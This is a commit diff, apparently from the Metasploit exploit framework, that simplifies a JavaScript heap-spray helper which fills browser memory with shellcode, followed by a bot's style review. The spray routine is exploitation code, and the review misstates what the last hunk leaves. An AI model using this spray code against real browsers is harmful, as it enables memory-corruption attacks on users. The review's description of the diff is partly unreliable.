One size rules them all.

bug/bundler_fix
sinn3r 2013-02-28 11:21:23 -06:00
parent 722e077029
commit 8cb5da0794
1 changed files with 2 additions and 29 deletions


@ -799,8 +799,6 @@ protected
# #
# The "sprayHeap" JavaScript function supports the following arguments: # The "sprayHeap" JavaScript function supports the following arguments:
# shellcode => The shellcode to spray in JavaScript. # shellcode => The shellcode to spray in JavaScript.
# browser => The type of browser to target for precise block size, such as:
# 'ie8', 'ie9', 'ie10', and 'generic'.
# objId => Optional. The ID for a <div> HTML tag. # objId => Optional. The ID for a <div> HTML tag.
# offset => Optional. Number of bytes to align the shellcode, default: 0x104 # offset => Optional. Number of bytes to align the shellcode, default: 0x104
# heapBlockSize => Optional. Allocation size, default: 0x80000 # heapBlockSize => Optional. Allocation size, default: 0x80000
@ -822,7 +820,6 @@ protected
function sprayHeap( oArg ) { function sprayHeap( oArg ) {
shellcode = oArg.shellcode; shellcode = oArg.shellcode;
browser = oArg.browser;
offset = oArg.offset; offset = oArg.offset;
heapBlockSize = oArg.heapBlockSize; heapBlockSize = oArg.heapBlockSize;
maxAllocs = oArg.maxAllocs; maxAllocs = oArg.maxAllocs;
@ -832,7 +829,6 @@ protected
if (offset == undefined) { offset = 0x104; } if (offset == undefined) { offset = 0x104; }
if (heapBlockSize == undefined) { heapBlockSize = 0x80000; } if (heapBlockSize == undefined) { heapBlockSize = 0x80000; }
if (maxAllocs == undefined) { maxAllocs = 0x350; } if (maxAllocs == undefined) { maxAllocs = 0x350; }
if (browser == undefined) { browser = 'generic'; }
if (offset > 0x800) { throw "Bad alignment"; } if (offset > 0x800) { throw "Bad alignment"; }
@ -855,31 +851,8 @@ protected
for (var i = 0; i < maxAllocs; i++) for (var i = 0; i < maxAllocs; i++)
{ {
var obj = document.createElement("button"); var obj = document.createElement("button");
switch (browser)
{
case 'ie8':
obj.title = data.substring(0, (heapBlockSize-6)/2);
div_container.appendChild(obj);
break;
case 'ie9':
obj.title = data.substring(0, (heapBlockSize-2)/2); obj.title = data.substring(0, (heapBlockSize-2)/2);
div_container.appendChild(obj); div_container.appendChild(obj);
break;
case 'ie10':
obj.title = data.substring(0, (heapBlockSize-2)/2);
div_container.appendChild(obj);
break;
case 'generic':
obj.title = data.substring(0, (heapBlockSize-2)/2);
div_container.appendChild(obj);
break;
default:
throw "Invalid argument";
}
} }
} }
| |
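Review bot: The assignments that open the `sprayHeap` body in the second hunk (`shellcode = oArg.shellcode;` through `maxAllocs = oArg.maxAllocs;`) carry no `var`, so unless these names are declared elsewhere in the heredoc they become implicit globals in sloppy mode and would raise a ReferenceError if the embedded script were ever run under `'use strict'`; prefixing each with `var` keeps them local to the function, e.g. `var shellcode = oArg.shellcode;`. The defaults in the third hunk rely on `== undefined`; with the locals declared, `if (offset === undefined) { offset = 0x104; }` states the intent precisely and avoids the loose-equality idiom. The two `throw "..."` statements (`"Bad alignment"` in the third hunk and the one the last hunk leaves at its close) throw bare strings, which lose the stack trace; `throw new Error("Bad alignment");` is the conventional form. `sprayHeap` begins in the second hunk and its body spans the later hunks, so the lines between them are outside this view.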